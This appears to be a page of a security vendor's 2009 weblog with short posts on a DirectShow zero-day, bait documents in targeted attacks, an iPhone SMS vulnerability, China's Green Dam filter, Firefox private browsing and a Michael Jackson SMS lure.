Here's a video of how ISTP does against the new vulnerability and what happens if you disable parts of the protection technologies.

ISTP in action

0-Day Vulnerability in DirectShow Posted by Sean @ 14:36 GMT

A 0-day vulnerability in Microsoft DirectShow has been discovered being exploited in the wild.

Drive-by attacks using thousands of compromised websites are reportedly involved.

SANS Internet Storm Center has details (including a killbit) in their Handler's Diary. There is not yet a Microsoft Advisory.

We detect the exploit as Exploit:W32/Agent.LBV.

The exploit targets Microsoft Internet Explorer… so one workaround is kind of obvious.

Use some other browser besides Internet Explorer until this vulnerability is patched.

 
 

 
 
Friday, July 3, 2009

 
Bait Files Posted by Mikko @ 09:50 GMT

It's always interesting to browse through the bait document files used in targeted attacks. These are files that have been used to infect specific individuals in different organizations in order to gain access to their computer.

All the documents shown below contained exploits that installed backdoors. Targets of these attacks are not known.

[Screenshots of six bait documents]

This is just a quick sampling; we get a lot of these.

 
 

 
 
Thursday, July 2, 2009

 
SMS Remote Code Execution Vulnerability in iPhone Posted by Patrik @ 18:30 GMT

Charlie Miller, a well-known security researcher who specializes in Mac and iPhone security, yesterday revealed information about a new vulnerability in iPhone that allows remote code execution via SMS. Not a lot is known about the vulnerability, which was announced at the SyScan conference in Singapore, except that Charlie is working with Apple to get it fixed as soon as possible.


(picture from apple.com)

This is about as bad as it gets: the vulnerability seems to allow unsigned code to run, which circumvents a core part of the iPhone's security model, since the device normally runs only signed code, i.e. apps approved by Apple. No user interaction is required, unlike with current mobile malware. InfoWorld has the original story here.

Charlie plans to reveal more information at BlackHat USA.

PS. I'm shift manager for one of our three daily response shifts this week and I'm tweeting about what we're doing on the shift over at http://twitter.com/patrikrunald.

—————

Updated to add: Dan Goodin has more at The Register.

China's Dam Delay Posted by Sean @ 13:22 GMT

The Wall Street Journal reports that Beijing has delayed its mandate to have Green Dam Youth Escort filtering software installed on all new Windows computers sold in China. The deadline was originally July 1st.

http://en.wikipedia.org/wiki/File:Green_Dam_Youth_Escort_logo.png

PC World's take is that implementation of Green Dam is only a matter of time.

Our take?

If China wants to require anti-pornography filtering software that's China's business, not ours.

But the same software on EVERY computer sold in China? That's monoculture.

And as we've noted before, monocultures are subject to catastrophic failure in the event of a successful attack.

—————

More: China's Web filtering starts in the West

 
 

 
 
Wednesday, July 1, 2009

 
Private Browsing Posted by Sean @ 15:46 GMT

Firefox 3.5 was released yesterday. I've been waiting to try out the Private Browsing Mode, so I installed it today.

Here are the privacy settings from my installation of Firefox 3.0.1.

Firefox 3.0.1 Privacy Options

And when I installed Firefox 3.5 the Private Browsing option was disabled. What?

Firefox 3.5 Tools Menu

Seems that the installation recognized my 3.0.1 settings as the equivalent of Private Browsing and preconfigured 3.5 to "Automatically start Firefox in a private browsing session".

Very nice work.

Firefox 3.5 Privacy Options

So, nothing changed at all. Except now I have easy options to reconfigure por… paranoi… err, Private Browsing if I opt to do so.

Time to experiment.

Signing off,
Sean

King Of Pop SMSes Posted by Alia @ 02:10 GMT

With all the talk of Michael Jackson spam and Michael Jackson malware going on, it was mildly interesting today when a Fellow in our KUL Lab received an SMS – with link – that mentioned the King of Pop as well:

Michael Jackson SMS

The IP address appears to be registered in Malaysia but fortunately the link doesn't seem to work.